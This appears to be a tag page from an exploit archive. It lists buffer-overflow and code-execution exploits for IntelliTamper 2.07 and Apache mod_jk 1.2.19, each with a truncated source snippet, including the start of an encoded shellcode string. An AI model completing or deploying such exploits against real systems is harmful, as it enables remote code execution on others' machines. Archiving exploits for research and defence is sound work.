标签:x49
-
IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow Exploit”
#!/usr/bin/perl#use warnings;use strict;# CMD="c:windowssystem32calc.exe"# [*] x86/alpha_mixed succeeded, final size 344my $shellcode = "xdaxc3xd9x74x24xf4x5ax4ax4ax4ax4ax4ax4ax4ax4a&...
-
IntelliTamper 2.07 (map file) Local Arbitrary Code Execution Exploit (pl)”
#!/usr/bin/perl# k`sOSe - 7/21/2008# http://secunia.com/advisories/20172# A sploit for an ancient vuln. Just because i need # to improve my skills on windows explotation.use warnings;use strict;# CMD="c:window...
-
Apache mod_jk 1.2.19 Remote Buffer Overflow Exploit (win32)”
#!/usr/bin/python## _____ _ _ _____ _____ _____ _____# / ___| |_| | _ | _ | _ |_ _|# | (___| _ | [_)_/| (_) | (_) | | |# _____|_| |_|_| |_||_____|_____| |_|# C. H. R. O. O. T. SECURITY GROUP#...
-
IntelliTamper 2.07 HTTP Header Remote Code Execution Exploit”
/****** IntelliTamper 2.07 Location: HTTP Header Remote Code Execution exploit.**** Based on exploit by Koshi (written in Perl). This one should be more** stable. Just for fun and to learn more about win32 exploitation.**** by Wo...